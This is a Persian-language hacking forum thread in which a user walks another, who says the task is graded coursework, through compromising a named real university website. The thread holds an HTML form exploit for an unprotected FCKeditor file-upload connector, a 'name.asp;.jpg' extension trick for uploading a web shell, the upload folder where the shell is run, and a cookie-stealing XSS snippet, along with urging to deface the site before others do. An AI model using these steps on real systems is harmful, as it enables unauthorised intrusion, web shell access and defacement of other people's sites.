[parvin]

الان من اين ادرس ها رو باز ميكنم كه هيچ اتفاقي نميوفته.
چطوري ميشه با اين باگ يه تصوير دلخواه گذاشت بذاريم تو سايت

[Amin_Mansouri]

ببینید باید باگ xss تو قسمت نظرات باشه اون که من مثال زدم یه تست بود توی قسمت نظرات باید باشه وقتی ادمین پیغامو دید کوکیشو زد نه اینجوری
این سایت باگ های خیلی بیشتر از xss داره !

[parvin]

تو باگ xss ميشه تو اسكريپت ادرس يه تصوير كه قبلا يه جاي ديگه اپلود كرديم رو داد؟

[Amin_Mansouri]

اره حتی میشه هدایتش کرد به یه صفحه دیگه
البته لینک باید مدیر سایت ببینه اونم توضیح میدم
سوالهای دیگه رو تو بخش دیگه بپرسید اگر یر xss دارید.
تارگت رو که دادید اسکن کنید خیلی باگ داره

[Amin_Mansouri]

اینم از سایت شما
http://jjs.uestc.edu.cn/upload/file/3014...1917_n.jpg

خوابم میاد حوصله ترتیبشو دادن ندارم

[parvin]

ممنون . میشه بگید این کار رو چطوری کردید؟ با کدوم باگش ؟ من اسکنش کردم و 7 تا باگ داشت. با کدومش شد عکستون رو بریزید؟ روشش رو هم بگید. ببخشید 3 نمره داره باید روشش رو بلد باشم .جبران میکنم

[Amin_Mansouri]

چطوری جبران میکنی ؟ :d (شوخی)
وب سایتو اسکن کردم یه fckeditor داشت لعنتی سایت که نبود همه fckeditor هاش خراب بود.
بعد اگر توجه کنی به اسکنر ادرس زیر رو میده

کد:

http://jjs.uestc.edu.cn:80/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/

بعد از طریق خود fckeditor هم نمیشد چیزی اپلود کنی پس راه حل چی بود ؟
به کد زیر توجه کن
notepad رو باز کن کدهای زیر رو داخلش کپی کن و به اسم parvin.html ذخیره کن

کد :

کد:

<strong>parsicoders File Uploader Exploit In FCKeditor</strong>
<form enctype="multipart/form-data" action="
http://jjs.uestc.edu.cn:80/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/"
method="post">
<input name="NewFile" type="file">
<input type="submit" value="submit">
</form>

حالا فایل parvin.html رو اجرا کن !

حالا میتونی شل و یا عکستو اپلود کنی باید یه شل پیدا کنی که شناسایی نشه و پاک نشه اپلود کن و دیفیس بزن حالشو ببر

کارشو زودی تمام کن تا کس دیگه ترتیبشو نداده این سایت ها افت کلاسه که هکشون کنم :-)

هر وقت خواستی shell اپلود کنی اسمشو به این نام تغییر بده

کد:

parvin.asp;.jpg

فایل شل رو وقتی اپلود کردی تو این پوشه پیدا کن و اجراش کن

کد:

http://jjs.uestc.edu.cn/upload/file

به همین راحتی و به همین باحالی :P

[parvin]

مرسي

کد:

http://jjs.uestc.edu.cn/upload/file/PPPP.JPG

[Amin_Mansouri]

مرسي

کد:

http://jjs.uestc.edu.cn/upload/file/PPPP.JPG

استادتون همین سایته رو داده ؟
اگر داده همین کافیه چون fckeditor اپلودش رو bypass شده
بگرد یه شل پیدا کن کلا دیفیس بزن :d

[Ghoghnus]

امین جان اگه به جای ساختن اون فای و اپلودش از این دستور استفاده کنیم نتیجه فرق میکنه!

کد:

<script>alert(document.cookie)</script>

اگه نه حس میکنم این ورش خیلی راحتتر باشه!